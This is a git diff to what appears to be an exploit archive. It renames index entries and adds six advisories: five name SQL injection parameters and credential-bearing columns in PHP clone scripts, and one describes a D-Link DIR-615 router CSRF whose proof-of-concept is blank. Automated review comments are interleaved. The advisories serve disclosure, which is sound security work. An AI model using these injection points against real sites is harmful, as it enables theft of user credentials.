diff --git a/files.csv b/files.csv
index a7b985b1a..74dc93179 100644
--- a/files.csv
+++ b/files.csv
@@ -203,7 +203,7 @@ id,file,description,date,author,platform,type,port
 1129,platforms/windows/dos/1129.c,"Quick 'n EasY 3.0 FTP Server - Remote Denial of Service",2005-08-02,Kozan,windows,dos,0
 1137,platforms/windows/dos/1137.pl,"Acunetix HTTP Sniffer - Denial of Service",2005-08-05,basher13,windows,dos,0
 1143,platforms/windows/dos/1143.sys,"Microsoft Windows XP SP2 - 'rdpwd.sys' Remote Kernel Denial of Service",2005-08-09,"Tom Ferris",windows,dos,0
-41796,platforms/multiple/dos/41796.c,"macOS/iOS Kernel 10.12.3 (16D32) - 'bpf' Heap Overflow",2017-04-04,"Google Security Research",multiple,dos,0
+41796,platforms/multiple/dos/41796.c,"Apple macOS/iOS Kernel 10.12.3 (16D32) - 'bpf' Heap Overflow",2017-04-04,"Google Security Research",multiple,dos,0
 1153,platforms/hardware/dos/1153.pl,"Grandstream Budge Tone 101/102 VOIP Phone - Denial of Service",2005-08-12,"Pierre Kroma",hardware,dos,0
 1156,platforms/windows/dos/1156.c,"Chris Moneymakers World Poker Championship 1.0 - Denial of Service",2005-08-17,"Luigi Auriemma",windows,dos,0
 1157,platforms/cgi/dos/1157.pl,"GTChat 0.95 Alpha - Remote Denial of Service",2005-08-18,RusH,cgi,dos,0
@@ -1910,9 +1910,9 @@ id,file,description,date,author,platform,type,port
 16270,platforms/linux/dos/16270.c,"vsftpd 2.3.2 - Denial of Service",2011-03-02,"Maksymilian Arciemowicz",linux,dos,0
 16284,platforms/unix/dos/16284.rb,"Subversion - Date Svnserve (Metasploit)",2010-08-07,Metasploit,unix,dos,0
 16365,platforms/windows/dos/16365.rb,"Microsoft Plug and Play Service - Overflow Exploit (MS05-039) (Metasploit)",2010-08-30,Metasploit,windows,dos,0
-41793,platforms/multiple/dos/41793.c,"macOS/iOS Kernel 10.12.3 (16D32) - SIOCGIFORDER Socket ioctl Off-by-One Memory Corruption",2017-04-04,"Google Security Research",multiple,dos,0
+41793,platforms/multiple/dos/41793.c,"Apple macOS/iOS Kernel 10.12.3 (16D32) - SIOCGIFORDER Socket ioctl Off-by-One Memory Corruption",2017-04-04,"Google Security Research",multiple,dos,0
 16657,platforms/aix/dos/16657.rb,"PointDev IDEAL Migration - Buffer Overflow (Metasploit)",2010-09-25,Metasploit,aix,dos,0
-41798,platforms/macos/dos/41798.c,"macOS Kernel 10.12.2 (16C67) - Memory Disclosure Due to Lack of Bounds Checking in AppleIntelCapriController::getDisplayPipeCapability",2017-04-04,"Google Security Research",macos,dos,0
+41798,platforms/macos/dos/41798.c,"Apple macOS Kernel 10.12.2 (16C67) - Memory Disclosure Due to Lack of Bounds Checking in AppleIntelCapriController::getDisplayPipeCapability",2017-04-04,"Google Security Research",macos,dos,0
 16790,platforms/windows/dos/16790.rb,"PSOProxy 0.91 - Stack Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,dos,8080
 16929,platforms/aix/dos/16929.rb,"AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,aix,dos,0
 16939,platforms/multiple/dos/16939.txt,"Hiawatha WebServer 7.4 - Denial of Service",2011-03-07,"Rodrigo Escobar",multiple,dos,0
@@ -5335,8 +5335,8 @@ id,file,description,date,author,platform,type,port
 40946,platforms/windows/dos/40946.html,"Microsoft Internet Explorer 11 - MSHTML CSpliceTreeEngine::RemoveSplice Use-After-Free (MS14-035)",2016-12-20,Skylined,windows,dos,0
 40947,platforms/windows/dos/40947.html,"Microsoft Edge - SIMD.toLocaleString Uninitialized Memory (MS16-145)",2016-12-21,"Google Security Research",windows,dos,0
 40948,platforms/windows/dos/40948.html,"Microsoft Edge - Internationalization Initialization Type Confusion (MS16-144)",2016-12-21,"Google Security Research",windows,dos,0
-40952,platforms/macos/dos/40952.c,"macOS 10.12.1 Kernel - Writable Privileged IOKit Registry Properties Code Execution",2016-12-22,"Google Security Research",macos,dos,0
-40954,platforms/macos/dos/40954.c,"macOS 10.12 - Double vm_deallocate in Userspace MIG Code Use-After-Free",2016-12-22,"Google Security Research",macos,dos,0
+40952,platforms/macos/dos/40952.c,"Apple macOS 10.12.1 Kernel - Writable Privileged IOKit Registry Properties Code Execution",2016-12-22,"Google Security Research",macos,dos,0
+40954,platforms/macos/dos/40954.c,"Apple macOS 10.12 - Double vm_deallocate in Userspace MIG Code Use-After-Free",2016-12-22,"Google Security Research",macos,dos,0
 40955,platforms/multiple/dos/40955.txt,"macOS < 10.12.2 / iOS < 10.2 Kernel - ipc_port_t Reference Count Leak Due to Incorrect externalMethod Overrides Use-After-Free",2016-12-22,"Google Security Research",multiple,dos,0
 40958,platforms/multiple/dos/40958.c,"macOS 10.12.1 / iOS < 10.2 - powerd Arbitrary Port Replacement",2016-12-22,"Google Security Research",multiple,dos,0
 40959,platforms/multiple/dos/40959.c,"macOS 10.12.1 / iOS < 10.2 - syslogd Arbitrary Port Replacement",2016-12-22,"Google Security Research",multiple,dos,0
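Review bot: The `Apple ` prefix is applied to 40952 and 40954 only, while the context rows 40955, 40958 and 40959 in this same hunk keep the bare `macOS ...` form, so the index is left half-normalized; the hunk at -8858 has the same gap, prefixing 40956 but leaving 40957 unchanged. If every Apple kernel entry is meant to read `Apple macOS ...`, the untouched rows belong in the same commit, e.g. `40955,platforms/multiple/dos/40955.txt,"Apple macOS < 10.12.2 / iOS < 10.2 Kernel - ipc_port_t Reference Count Leak Due to Incorrect externalMethod Overrides Use-After-Free",2016-12-22,"Google Security Research",multiple,dos,0`. If the selection is deliberate, a one-line commit description stating the rule (for instance "only entries with a 41xxx-era title format") would stop the next editor from re-raising this.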
@@ -5433,13 +5433,13 @@ id,file,description,date,author,platform,type,port
 41668,platforms/multiple/dos/41668.txt,"APNGDis 2.8 - 'chunk size descriptor' Heap Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos,0
 41669,platforms/multiple/dos/41669.txt,"APNGDis 2.8 - 'image width / height chunk' Heap Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos,0
 41670,platforms/multiple/dos/41670.txt,"APNGDis 2.8 - 'filename' Stack Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos,0
-41791,platforms/macos/dos/41791.c,"macOS Kernel 10.12.3 (16D32) - Use-After-Free Due to Double-Release in posix_spawn",2017-04-04,"Google Security Research",macos,dos,0
-41792,platforms/multiple/dos/41792.c,"macOS/iOS Kernel 10.12.3 (16D32) - SIOCSIFORDER Socket ioctl Memory Corruption Due to Bad Bounds Checking",2017-04-04,"Google Security Research",multiple,dos,0
-41797,platforms/macos/dos/41797.c,"macOS Kernel 10.12.3 (16D32) - 'audit_pipe_open' Off-by-One Memory Corruption",2017-04-04,"Google Security Research",macos,dos,0
-41794,platforms/multiple/dos/41794.c,"macOS/iOS Kernel 10.12.3 (16D32) - Bad Locking in necp_open Use-After-Free",2017-04-04,"Google Security Research",multiple,dos,0
+41791,platforms/macos/dos/41791.c,"Apple macOS Kernel 10.12.3 (16D32) - Use-After-Free Due to Double-Release in posix_spawn",2017-04-04,"Google Security Research",macos,dos,0
+41792,platforms/multiple/dos/41792.c,"Apple macOS/iOS Kernel 10.12.3 (16D32) - SIOCSIFORDER Socket ioctl Memory Corruption Due to Bad Bounds Checking",2017-04-04,"Google Security Research",multiple,dos,0
+41797,platforms/macos/dos/41797.c,"Apple macOS Kernel 10.12.3 (16D32) - 'audit_pipe_open' Off-by-One Memory Corruption",2017-04-04,"Google Security Research",macos,dos,0
+41794,platforms/multiple/dos/41794.c,"Apple macOS/iOS Kernel 10.12.3 (16D32) - Bad Locking in necp_open Use-After-Free",2017-04-04,"Google Security Research",multiple,dos,0
 41778,platforms/multiple/dos/41778.cc,"Apple macOS/IOS 10.12.2 (16C67) - 
'mach_msg' Heap Overflow",2017-03-30,"Google Security Research",multiple,dos,0
 41781,platforms/linux/dos/41781.c,"BackBox OS - Denial of Service",2017-04-02,FarazPajohan,linux,dos,0
-41790,platforms/macos/dos/41790.c,"macOS Kernel 10.12.2 (16C67) - 'AppleIntelCapriController::GetLinkConfig' Code Execution Due to Lack of Bounds Checking",2017-04-04,"Google Security Research",macos,dos,0
+41790,platforms/macos/dos/41790.c,"Apple macOS Kernel 10.12.2 (16C67) - 'AppleIntelCapriController::GetLinkConfig' Code Execution Due to Lack of Bounds Checking",2017-04-04,"Google Security Research",macos,dos,0
 41715,platforms/linux/dos/41715.txt,"wifirxpower - Local Buffer Overflow",2017-03-23,"Nassim Asrir",linux,dos,0
 41734,platforms/windows/dos/41734.c,"Microsoft Visual Studio 2015 update 3 - Denial of Service",2017-03-26,"Peter Baris",windows,dos,0
 41737,platforms/windows/dos/41737.txt,"Disk Sorter Enterprise 9.5.12 - Local Buffer Overflow",2017-03-27,"Nassim Asrir",windows,dos,0
@@ -6805,7 +6805,7 @@ id,file,description,date,author,platform,type,port
 16173,platforms/windows/local/16173.py,"AutoPlay 1.33 (autoplay.ini) - Local Buffer Overflow (SEH)",2011-02-15,badc0re,windows,local,0
 16253,platforms/windows/local/16253.py,"Elecard AVC_HD/MPEG Player 5.7 - Buffer Overflow",2011-02-27,sickness,windows,local,0
 16307,platforms/multiple/local/16307.rb,"PeaZIP 2.6.1 - Zip Processing Command Injection (Metasploit)",2010-09-20,Metasploit,multiple,local,0
-41804,platforms/multiple/local/41804.c,"macOS/iOS Kernel 10.12.3 (16D32) - Double-Free Due to Bad Locking in fsevents Device",2017-04-04,"Google Security Research",multiple,local,0
+41804,platforms/multiple/local/41804.c,"Apple macOS/iOS Kernel 10.12.3 (16D32) - Double-Free Due to Bad Locking in fsevents Device",2017-04-04,"Google Security Research",multiple,local,0
 40435,platforms/lin_x86/local/40435.rb,"Linux Kernel 4.6.3 (x86) - 'Netfilter' Privilege Escalation (Metasploit)",2016-09-27,Metasploit,lin_x86,local,0
 16503,platforms/windows/local/16503.rb,"Adobe - 'Doc.media.newPlayer' Use-After-Free (Metasploit) (1)",2010-04-30,Metasploit,windows,local,0
 16504,platforms/windows/local/16504.rb,"Adobe - 'util.printf()' Buffer Overflow (Metasploit) (1)",2010-05-03,Metasploit,windows,local,0
@@ -8858,7 +8858,7 @@ id,file,description,date,author,platform,type,port
 40943,platforms/linux/local/40943.txt,"Google Chrome + Fedora 25 / Ubuntu 16.04 - 'tracker-extract' / 'gnome-video-thumbnailer' + 'totem' Drive-By Download",2016-12-13,"Chris Evans",linux,local,0
 40950,platforms/aix/local/40950.sh,"IBM AIX 6.1/7.1/7.2 - 'Bellmail' Privilege Escalation",2016-12-22,"Hector X. Monsegur",aix,local,0
 40953,platforms/linux/local/40953.sh,"Vesta Control Panel 0.9.8-16 - Privilege Escalation",2016-12-22,"Luka Pusic",linux,local,0
-40956,platforms/macos/local/40956.c,"macOS < 10.12.2 / iOS < 10.2 Kernel - _kernelrpc_mach_port_insert_right_trap Reference Count Leak / Use-After-Free",2016-12-22,"Google Security Research",macos,local,0
+40956,platforms/macos/local/40956.c,"Apple macOS < 10.12.2 / iOS < 10.2 Kernel - _kernelrpc_mach_port_insert_right_trap Reference Count Leak / Use-After-Free",2016-12-22,"Google Security Research",macos,local,0
 40957,platforms/macos/local/40957.c,"macOS < 10.12.2 / iOS < 10.2 - Broken Kernel Mach Port Name uref Handling Privileged Port Name Replacement Privilege Escalation",2016-12-22,"Google Security Research",macos,local,0
 40962,platforms/linux/local/40962.txt,"OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation",2016-12-23,"Google Security Research",linux,local,0
 40967,platforms/windows/local/40967.txt,"Wampserver 3.0.6 - Insecure File Permissions Privilege Escalation",2016-12-26,"Heliand Dema",windows,local,0
@@ -15393,7 +15393,7 @@ id,file,description,date,author,platform,type,port
 41358,platforms/php/remote/41358.rb,"Piwik 2.14.0 / 2.16.0 / 2.17.1 / 3.0.1 - Superuser Plugin Upload (Metasploit)",2017-02-14,Metasploit,php,remote,80
 41366,platforms/java/remote/41366.java,"OpenText Documentum D2 - Remote Code Execution",2017-02-15,"Andrey B. Panfilov",java,remote,0
 41436,platforms/windows/remote/41436.py,"Disk Savvy Enterprise 9.4.18 - Buffer Overflow (SEH)",2017-02-22,"Peter Baris",windows,remote,0
-41443,platforms/macos/remote/41443.html,"macOS HelpViewer 10.12.1 - XSS Leads to Arbitrary File Execution and Arbitrary File Read",2017-02-23,"Google Security Research",macos,remote,0
+41443,platforms/macos/remote/41443.html,"Apple macOS HelpViewer 10.12.1 - XSS Leads to Arbitrary File Execution and Arbitrary File Read",2017-02-23,"Google Security Research",macos,remote,0
 41471,platforms/arm/remote/41471.rb,"MVPower DVR TV-7104HE 1.8.4 115215B9 - Shell Unauthenticated Command Execution (Metasploit)",2017-02-27,Metasploit,arm,remote,0
 41479,platforms/windows/remote/41479.py,"SysGauge 1.5.18 - Buffer Overflow",2017-02-28,"Peter Baris",windows,remote,0
 41480,platforms/hardware/remote/41480.txt,"WePresent WiPG-1500 - Backdoor Account",2017-02-27,"Quentin Olagne",hardware,remote,0
@@ -37688,3 +37688,9 @@ id,file,description,date,author,platform,type,port
 41774,platforms/php/webapps/41774.py,"EyesOfNetwork (EON) 5.1 - SQL Injection",2017-03-29,"Dany Bach",php,webapps,0
 41779,platforms/multiple/webapps/41779.txt,"Splunk Enterprise - Information Disclosure",2017-03-31,hyp3rlinx,multiple,webapps,0
 41780,platforms/php/webapps/41780.txt,"Membership Formula - 'order' Parameter SQL Injection",2017-03-31,"Ihsan Sencan",php,webapps,0
+41816,platforms/php/webapps/41816.txt,"ImagePro Lazygirls Clone Script - SQL Injection",2017-04-05,"Ihsan Sencan",php,webapps,0
+41817,platforms/php/webapps/41817.txt,"Airbnb Crashpadder Clone Script - SQL Injection",2017-04-05,"Ihsan Sencan",php,webapps,0
+41818,platforms/php/webapps/41818.txt,"Premium Penny Auction Script - SQL Injection",2017-04-05,"Ihsan Sencan",php,webapps,0
+41819,platforms/php/webapps/41819.txt,"Sweepstakes Pro Software - SQL Injection",2017-04-05,"Ihsan Sencan",php,webapps,0
+41820,platforms/php/webapps/41820.txt,"Appointment Script - SQL Injection",2017-04-05,"Ihsan Sencan",php,webapps,0
+41821,platforms/hardware/webapps/41821.txt,"D-Link DIR-615 - Cross-Site Request Forgery",2017-04-05,"Pratik S. Shah",hardware,webapps,0
diff --git a/platforms/hardware/webapps/41821.txt b/platforms/hardware/webapps/41821.txt
new file mode 100755
index 000000000..47806c4a4
--- /dev/null
+++ b/platforms/hardware/webapps/41821.txt
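Review bot: The new index row for 41820 describes the entry as `Appointment Script - SQL Injection`, but the advisory added in platforms/php/webapps/41820.txt titles itself `Doctors Appointment Script - SQL Injection`, so a search on the product name as the author wrote it misses the index entry. The row should read `41820,platforms/php/webapps/41820.txt,"Doctors Appointment Script - SQL Injection",2017-04-05,"Ihsan Sencan",php,webapps,0`. The other four `Exploit Title` lines (41816–41819) match their rows exactly, which suggests this one was trimmed by hand.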
@@ -0,0 +1,160 @@
+Title:
+====
+
+D-Link DIR 615 HW: T1 FW:20.09 is vulnerable to Cross-Site Request Forgery (CSRF) vulnerability
+
+
+
+Credit:
+======
+
+Name: Pratik S. Shah
+
+
+
+Reference:
+=========
+
+CVE Details: CVE-2017-7398.
+
+
+
+Date:
+====
+
+1-04-2017
+
+
+
+Vendor:
+======
+
+D-Link wireless router
+
+
+
+Product:
+=======
+
+DIR-615
+
+
+http://www.dlink.co.in/products/?pid=678
+
+
+Affected Version:
+=============
+
+Hardware: T1 , Firmware: 20.09
+
+
+
+Abstract:
+=======
+
+This enables an attacker to perform an unwanted action on a wireless router for which the user/admin is currently authenticated.
+
+
+
+Attack Type:
+===================
+
+Remote
+
+
+
+Details:
+=========
+
+CSRF vulnerability in D-link DIR 615 wireless router enables an attacker to perform unwanted actions on router, which may lead to gaining full control of the device.
+
+
+
+Proof Of Concept:
+================
+
+1) User login to D-link DIR 615 wireless router
+
+2) User visits the attacker's malicious web page (DlinkCSRF.html)
+
+3) DlinkCSRF.html exploits CSRF vulnerability and changes the Security Options to None
+
+
+
+This is the CSRF POC for changing the Security option from WPA2 to None( Parameter: Method)
+
+Attacker can also tamper following parameters
+
+ hiddenSSID
+ SSID
+ Passwords for all the applicable security options
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+Disclosure Timeline:
+======================================
+Vendor Notification: 6th March 2017
+
+
diff --git a/platforms/php/webapps/41816.txt b/platforms/php/webapps/41816.txt
new file mode 100755
index 000000000..9b77319a7
--- /dev/null
+++ b/platforms/php/webapps/41816.txt
@@ -0,0 +1,28 @@
+# # # # #
+# Exploit Title: ImagePro Lazygirls Clone Script - SQL Injection
+# Google Dork: N/A
+# Date: 05.04.2017
+# Vendor Homepage: http://bimedia.info/
+# Software: http://bimedia.info/8-2/
+# Demo: http://imagepro.clonedemo.com/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?page=31&imageID=[SQL]
+# http://localhost/[PATH]/index.php?page=53&pg_id=[SQL]
+# tc_membergroups:id
+# tc_membergroups:group_name
+# tc_membergroups:admin
+# tc_members:id
+# tc_members:group_id
+# tc_members:username
+# tc_members:password
+# tc_members:email
+# tc_members:join_date
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41817.txt b/platforms/php/webapps/41817.txt
new file mode 100755
index 000000000..19afad4ee
--- /dev/null
+++ b/platforms/php/webapps/41817.txt
@@ -0,0 +1,19 @@
+# # # # #
+# Exploit Title: Airbnb Crashpadder Clone Script - SQL Injection
+# Google Dork: N/A
+# Date: 05.04.2017
+# Vendor Homepage: http://bimedia.info/
+# Software: http://bimedia.info/airbnb-premium-clone-script/
+# Demo: http://airbnb.clonedemo.com/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/page/1[SQL]
+# http://localhost/[PATH]/view-rental/1/1[SQL]
+# # # # #
\ No newline at end of file
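Review bot: All six advisories are added with `new file mode 100755` although they are plain `.txt` files with no interpreter line; `100644` is the expected mode for 41816–41821, and the executable bit on advisory text only invites accidental execution when the tree is checked out. The `Date:` field `1-04-2017` in this file is ambiguous between day-first and month-first order, whereas the index row and the `Disclosure Timeline` entry are unambiguous; an ISO form such as `2017-04-01` (if that is the intended date) would remove the doubt. The `Disclosure Timeline` records a vendor notification only, so a reader cannot tell whether a fixed firmware exists; a `Vendor Response:` or `Fix:` line, even `none at time of publication`, would make the defensive status explicit. On this rendering the hunk body between the parameter list and `Disclosure Timeline:` consists solely of empty added lines and totals fewer than the 160 lines the header announces, so the proof-of-concept portion appears to be missing from the page rather than from the commit.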
diff --git a/platforms/php/webapps/41818.txt b/platforms/php/webapps/41818.txt
new file mode 100755
index 000000000..3cce81745
--- /dev/null
+++ b/platforms/php/webapps/41818.txt
@@ -0,0 +1,29 @@
+# # # # #
+# Exploit Title: Premium Penny Auction Script - SQL Injection
+# Google Dork: N/A
+# Date: 05.04.2017
+# Vendor Homepage: http://bimedia.info/
+# Software: http://bimedia.info/premium-penny-auction-script/
+# Demo: http://pennyauction.clonedemo.com/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/allauctions.php?aid=[SQL]
+# http://localhost/[PATH]/news.php?nid=[SQL]
+# http://localhost/[PATH]/productdetails.php?aid=[SQL]&pid=[SQL]
+# admin :id
+# admin :username
+# admin :pass
+# affiliate_transaction :aff_id
+# affiliate_transaction :user_id
+# affiliate_transaction :referer_id
+# affiliate_transaction :amount
+# affiliate_transaction :commission
+# affiliate_transaction :bid_pack_title
+# # # # #
diff --git a/platforms/php/webapps/41819.txt b/platforms/php/webapps/41819.txt
new file mode 100755
index 000000000..6f64c0a5a
--- /dev/null
+++ b/platforms/php/webapps/41819.txt
@@ -0,0 +1,25 @@
+# # # # #
+# Exploit Title: Sweepstakes Pro Software - SQL Injection
+# Google Dork: N/A
+# Date: 05.04.2017
+# Vendor Homepage: http://bimedia.info/
+# Software: http://bimedia.info/sweepstakes-pro-software/
+# Demo: http://mysweepstakespro.com/demo/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/win.php?s=[SQL]
+# http://localhost/[PATH]/widget_lb.php?s=[SQL]
+# ss_members :id
+# ss_members :name
+# ss_members :email
+# ss_members :country
+# ss_members :their_username
+# ss_members :their_password
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41820.txt b/platforms/php/webapps/41820.txt
new file mode 100755
index 000000000..7abdd54b1
--- /dev/null
+++ b/platforms/php/webapps/41820.txt
@@ -0,0 +1,28 @@
+# # # # #
+# Exploit Title: Doctors Appointment Script - SQL Injection
+# Google Dork: N/A
+# Date: 05.04.2017
+# Vendor Homepage: http://appointment-script.com/
+# Software: http://appointment-script.com/demo
+# Demo: http://appointment-script.com/demo
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/search?lat=[SQL]&lon=[SQL]&category=[SQL]&insurance=[SQL]
+# user
+# id
+# first_name
+# last_name
+# username
+# email
+# password
+# user_level_id
+# Doctor profile images file upload vulnerability available.
+# http://localhost/[PATH]/images/doctor_image/...
+# # # # #
\ No newline at end of file